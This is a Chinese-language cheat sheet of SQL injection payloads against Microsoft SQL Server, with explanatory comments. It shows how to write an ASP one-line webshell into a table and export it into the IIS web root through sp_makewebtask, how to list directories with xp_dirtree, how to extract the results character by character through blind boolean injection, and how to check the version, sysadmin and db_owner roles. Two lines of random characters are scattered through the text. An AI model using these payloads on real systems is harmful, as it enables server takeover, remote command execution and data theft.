;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- //将一句话木马插入表中（URL 解码后写入的值为 <%execute request("p")%>）。pcguest 表和 pc 列只是示例，需要换成当前数据库用户有 INSERT 权限、且列类型能存放该字符串的表和列
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
//导出一个 ASP 文件：sp_makewebtask 把查询结果写成网页文件，存在表里的 <%...%> 随之落到 Web 根目录下，被 IIS 当作 ASP 执行。注意：sp_makewebtask 属于 Web Assistant 存储过程，只在 SQL Server 2000 中可直接使用，2005 起默认禁用并已弃用，后续版本已移除；@outputfile 的路径必须是 SQL Server 服务账号有写权限的目录

关于MSSQL列目录
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表，列数和顺序必须与 xp_dirtree 返回的三列（subdirectory、depth、file）一致，否则 INSERT ... EXEC 会失败
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用 xp_dirtree 列目录并把结果导入所建的表：第二个参数 1 为递归深度，第三个参数 1 表示同时列出文件。路径建议用单引号 'd:\app\'，因为 QUOTED_IDENTIFIER 为 ON 时双引号会被当作标识符而报错。另外 xp_dirtree 返回的 file 列是 0/1 标志（1 为文件，0 为目录），文件名和目录名都在 subdirectory 列
and (select Count(1) from [pctest]) between 0 and 99 //判断表中的行数（不是字段数），即目录下共有多少个文件和子目录：条件为真说明行数在 0 到 99 之间，逐步缩小 between 的范围即可二分定位
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二条记录（按 file、subdirectory 升序排列后的第 2 行，内层 Top 2 取前两行，外层按降序 Top 1 取其中最后一行）的 file+subdirectory 拼接串长度；把 Top 2 改成 Top N 即可定位第 N 条记录。注意长度里包含 file 列那 1 个字符的 0/1 标志
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐位猜解记录内容的每个字符（是字段值，不是字段名）：unicode() 返回该位字符的编码，用 between 二分确定；改变 substring 的起始位置遍历各位，改变内层 Top N 遍历各条记录
! \6 k+ `- `# _$ g+ w1 x# U
: r$ M/ z0 g1 f0 V2 e
数据库版本和权限查看
and 1=(select @@VERSION) //查看详细的数据库版本信息。原理是整数 1 与 @@VERSION 返回的字符串比较时触发类型转换错误，版本字符串被带进错误信息里，因此只在应用把数据库错误回显到页面时有效
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看当前登录是否属于 sysadmin 服务器角色（即 SA 级权限）：属于则返回 1，条件为真、页面正常；否则返回 0（登录名无效时返回 NULL），条件为假
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看当前用户在当前数据库中是否属于 db_owner 角色，同样以返回 1/0 判断。IS_MEMBER 只针对当前数据库，其他库的权限需要切换数据库后再测
/ Y; ~4 \+ q4 O, l- z& h0 `